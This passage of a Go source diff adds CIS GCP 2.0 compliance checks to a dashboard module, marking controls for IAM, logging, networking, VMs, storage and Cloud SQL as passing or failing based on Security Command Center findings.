logger) + m.checkCIS_5_2_PublicBuckets(ctx, logger) + + // Section 6: Cloud SQL + m.checkCIS_6_1_SQLPublicIP(ctx, logger) + m.checkCIS_6_2_SQLAuthorizedNetworks(ctx, logger) + m.checkCIS_6_3_SQLSSLRequired(ctx, logger) + m.checkCIS_6_4_SQLNoPublicIP(ctx, logger) + m.checkCIS_6_5_SQLBackups(ctx, logger) + m.checkCIS_6_6_SQLContainedDB(ctx, logger) + m.checkCIS_6_7_SQLCrossDBAOwnership(ctx, logger) + + // Section 7: BigQuery + m.checkCIS_7_1_BigQueryCMEK(ctx, logger) + m.checkCIS_7_2_BigQueryTableCMEK(ctx, logger) + m.checkCIS_7_3_BigQueryDatasetPublic(ctx, logger) +} + +// CIS Control Check Implementations +func (m *ComplianceDashboardModule) checkCIS_1_1_ServiceAccountAdmin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Admin is not assigned at project level", + Description: "The Service Account Admin role should not be assigned at the project level", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review IAM bindings and remove Service Account Admin role at project level", + References: []string{"https://cloud.google.com/iam/docs/understanding-roles"}, + } + + // Check SCC findings for this category + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_ADMIN_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account Admin role", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "iam-binding", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_2_ServiceAccountUser(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure 
Service Account User is not assigned at project level", + Description: "Service Account User role grants impersonation capabilities and should be restricted", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Remove Service Account User role at project level, assign at service account level instead", + References: []string{"https://cloud.google.com/iam/docs/service-accounts"}, + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_USER_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account User role", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_3_ServiceAccountKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are not created", + Description: "User-managed keys are a security risk and should be avoided", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use workload identity or short-lived tokens instead of user-managed keys", + References: []string{"https://cloud.google.com/iam/docs/best-practices-for-securing-service-accounts"}, + } + + if findings, ok := m.sccFindings["USER_MANAGED_SERVICE_ACCOUNT_KEY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d user-managed service account keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "service-account-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_4_ServiceAccountTokenCreator(ctx context.Context, 
logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Token Creator is properly scoped", + Description: "Token Creator role allows identity impersonation and should be carefully controlled", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review and restrict Service Account Token Creator role assignments", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_5_SeperationOfDuties(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure separation of duties is enforced", + Description: "Users should not have both Service Account Admin and Service Account User roles", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement separation of duties by assigning roles to different principals", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_6_KMSRoles(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure KMS encryption and decryption roles are separated", + Description: "KMS admin should not have encryption/decryption access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Separate KMS administration from encryption/decryption operations", + } + + if findings, ok := m.sccFindings["KMS_ROLE_SEPARATION"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_7_SAKeyRotation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.7", + Framework: "CIS-GCP-2.0", + 
ControlName: "Ensure service account keys are rotated within 90 days", + Description: "Service account keys should be rotated regularly", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement key rotation policy or use short-lived credentials", + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_KEY_NOT_ROTATED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d service account keys older than 90 days", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_8_UserManagedKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are reviewed", + Description: "All user-managed keys should be inventoried and reviewed", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Document and regularly review all user-managed service account keys", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_9_CloudKMSSeparation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud KMS cryptokeys are not anonymously or publicly accessible", + Description: "KMS keys should not be accessible to allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from Cloud KMS keys", + } + + if findings, ok := m.sccFindings["KMS_KEY_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible KMS keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "kms-key", 
m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_10_APIKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure API keys are restricted to only APIs and hosts that need them", + Description: "API keys should have appropriate restrictions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Apply API and host restrictions to all API keys", + } + + if findings, ok := m.sccFindings["API_KEY_NOT_RESTRICTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d unrestricted API keys", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 2: Logging and Monitoring Controls +func (m *ComplianceDashboardModule) checkCIS_2_1_CloudAuditLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Audit Logging is configured properly", + Description: "Cloud Audit Logs should be enabled for all services", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable Data Access audit logs for all services", + } + + if findings, ok := m.sccFindings["AUDIT_LOGGING_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d services with disabled audit logging", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_2_LogSinks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.2", + 
Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts exist for audit configuration changes", + Description: "Alerts should be configured for audit configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics and alerts for audit config changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_3_RetentionPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log bucket has retention policy with appropriate duration", + Description: "Log buckets should have retention policies configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Configure retention policies on all log storage buckets", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_4_ProjectOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for project ownership changes", + Description: "Alerts for project ownership changes should be configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for project ownership assignment changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_5_AuditConfigChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for audit configuration changes", + Description: "Monitor changes to audit configurations", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics for audit configuration changes", + } + m.mu.Lock() + m.Controls = 
append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_6_SQLInstanceChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for SQL instance configuration changes", + Description: "Monitor Cloud SQL instance configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_7_NetworkChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network changes", + Description: "Monitor VPC network creation, deletion, and modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC network changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_8_RouteChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC route changes", + Description: "Monitor VPC route modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC route changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_9_FirewallChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for firewall rule changes", + Description: "Monitor firewall rule creation, modification, and deletion", + Severity: 
"MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for firewall rule changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_10_VPCChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network firewall changes", + Description: "Monitor VPC firewall changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC firewall changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_11_SQLServerAccessChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.11", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for Cloud SQL Server access changes", + Description: "Monitor Cloud SQL authorization changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL authorization modifications", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 3: Networking Controls +func (m *ComplianceDashboardModule) checkCIS_3_1_DefaultNetwork(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default network does not exist", + Description: "The default network should be deleted as it has overly permissive firewall rules", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Delete the default network and create custom VPC networks", + } + + if findings, ok := m.sccFindings["DEFAULT_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d projects with default network", len(findings)) + + for _, resource := range 
findings { + m.addFailure(control, resource, "vpc-network", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_2_LegacyNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure legacy networks do not exist", + Description: "Legacy networks lack granular subnet control and should not be used", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Migrate from legacy networks to VPC networks", + } + + if findings, ok := m.sccFindings["LEGACY_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_3_DNSSEC(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure DNSSEC is enabled for Cloud DNS", + Description: "DNSSEC protects against DNS spoofing attacks", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable DNSSEC for all Cloud DNS managed zones", + } + + if findings, ok := m.sccFindings["DNSSEC_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_4_RSASHA1(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RSASHA1 is not used for zone-signing and key-signing", + Description: "RSASHA1 is considered weak for DNSSEC", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use 
RSASHA256 or ECDSAP256SHA256 for DNSSEC", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_5_RDPAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RDP access is restricted from the Internet", + Description: "RDP (port 3389) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict RDP access to specific IP ranges", + } + + if findings, ok := m.sccFindings["OPEN_RDP_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing RDP from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_6_SSHAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSH access is restricted from the Internet", + Description: "SSH (port 22) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict SSH access to specific IP ranges or use IAP", + } + + if findings, ok := m.sccFindings["OPEN_SSH_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing SSH from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m 
*ComplianceDashboardModule) checkCIS_3_7_FlowLogs(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC Flow Logs is enabled for every subnet", + Description: "VPC Flow Logs provide network traffic visibility", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable VPC Flow Logs on all subnets", + } + + if findings, ok := m.sccFindings["FLOW_LOGS_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_8_SSLPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSL policies use secure TLS versions", + Description: "SSL policies should require TLS 1.2 or higher", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Update SSL policies to require TLS 1.2+", + } + + if findings, ok := m.sccFindings["WEAK_SSL_POLICY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_9_FirewallLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure firewall rule logging is enabled", + Description: "Firewall rule logging provides audit trail for network access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable logging on all firewall rules", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_10_VPCNetworkPeering(ctx context.Context, logger internal.Logger) { 
+ control := ComplianceControl{ + ControlID: "CIS-3.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VPC network peering is properly configured", + Description: "Review VPC peering for appropriate trust relationships", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Review and document all VPC peering relationships", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 4: Virtual Machine Controls +func (m *ComplianceDashboardModule) checkCIS_4_1_DefaultServiceAccount(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default Compute Engine service account is not used", + Description: "VMs should use custom service accounts with minimal permissions", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Create custom service accounts for compute instances", + } + + if findings, ok := m.sccFindings["DEFAULT_SERVICE_ACCOUNT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs using default service account", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "compute-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_2_BlockProjectWideSSH(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure block project-wide SSH keys is enabled", + Description: "Block project-wide SSH keys to enforce instance-level access control", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable 'Block project-wide SSH keys' on all instances", + } + + if findings, ok := m.sccFindings["PROJECT_WIDE_SSH_KEYS_ALLOWED"]; ok && len(findings) > 0 
{ + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_3_OSLogin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure OS Login is enabled", + Description: "OS Login provides centralized SSH access management via IAM", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable OS Login at project or instance level", + } + + if findings, ok := m.sccFindings["OS_LOGIN_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_4_SerialPortDisabled(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure serial port access is disabled", + Description: "Serial port access should be disabled for security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable serial port access on all instances", + } + + if findings, ok := m.sccFindings["SERIAL_PORT_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_5_IPForwarding(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure IP forwarding is disabled unless required", + Description: "IP forwarding should only be enabled on NAT/gateway instances", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Disable IP forwarding 
on instances that don't require it", + } + + if findings, ok := m.sccFindings["IP_FORWARDING_ENABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_6_PublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure VMs do not have public IP addresses", + Description: "VMs should use private IPs and access internet via NAT", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Remove public IPs and use Cloud NAT for internet access", + } + + if findings, ok := m.sccFindings["PUBLIC_IP_ADDRESS"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d VMs with public IP addresses", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_7_ShieldedVM(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Shielded VM is enabled", + Description: "Shielded VMs provide verifiable integrity and boot security", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable Shielded VM features on all instances", + } + + if findings, ok := m.sccFindings["SHIELDED_VM_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_8_ComputeEncryption(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.8", + Framework: 
"CIS-GCP-2.0", + ControlName: "Ensure Compute Engine disks are encrypted with CSEK", + Description: "Use customer-supplied encryption keys (CSEK) for disk encryption", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable CSEK encryption for all Compute Engine disks", + } + + if findings, ok := m.sccFindings["DISK_CSEK_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_4_9_ConfidentialComputing(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-4.9", + Framework: "CIS-GCP-2.0", + ControlName: "Consider enabling Confidential Computing for sensitive workloads", + Description: "Confidential VMs encrypt data in use", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Evaluate Confidential Computing for sensitive workloads", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 5: Storage Controls +func (m *ComplianceDashboardModule) checkCIS_5_1_UniformBucketAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-5.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure uniform bucket-level access is enabled", + Description: "Uniform bucket-level access simplifies and secures IAM permissions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable uniform bucket-level access on all buckets", + } + + if findings, ok := m.sccFindings["BUCKET_POLICY_ONLY_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_5_2_PublicBuckets(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + 
ControlID: "CIS-5.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Storage buckets are not anonymously or publicly accessible", + Description: "Storage buckets should not allow public access", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove allUsers and allAuthenticatedUsers from bucket IAM", + } + + publicFindings := []string{} + for category, findings := range m.sccFindings { + if strings.Contains(strings.ToLower(category), "public_bucket") || + strings.Contains(strings.ToLower(category), "bucket_public") { + publicFindings = append(publicFindings, findings...) + } + } + + if len(publicFindings) > 0 { + control.Status = "FAIL" + control.FailCount = len(publicFindings) + control.Details = fmt.Sprintf("Found %d publicly accessible buckets", len(publicFindings)) + + for _, resource := range publicFindings { + m.addFailure(control, resource, "storage-bucket", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 6: Cloud SQL Controls +func (m *ComplianceDashboardModule) checkCIS_6_1_SQLPublicIP(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL instances do not have public IPs", + Description: "Cloud SQL should use private IP only", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Configure Cloud SQL to use private IP only", + } + + if findings, ok := m.sccFindings["SQL_PUBLIC_IP"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d Cloud SQL instances with public IP", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "cloudsql-instance", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + 
m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_2_SQLAuthorizedNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL authorized networks do not include 0.0.0.0/0", + Description: "Restrict authorized networks to specific IP ranges", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove 0.0.0.0/0 from authorized networks", + } + + if findings, ok := m.sccFindings["PUBLIC_SQL_INSTANCE"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_6_3_SQLSSLRequired(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-6.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud SQL requires SSL connections", + Description: "SSL should be required for all database connections", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable 'Require SSL' for Cloud SQL instances", 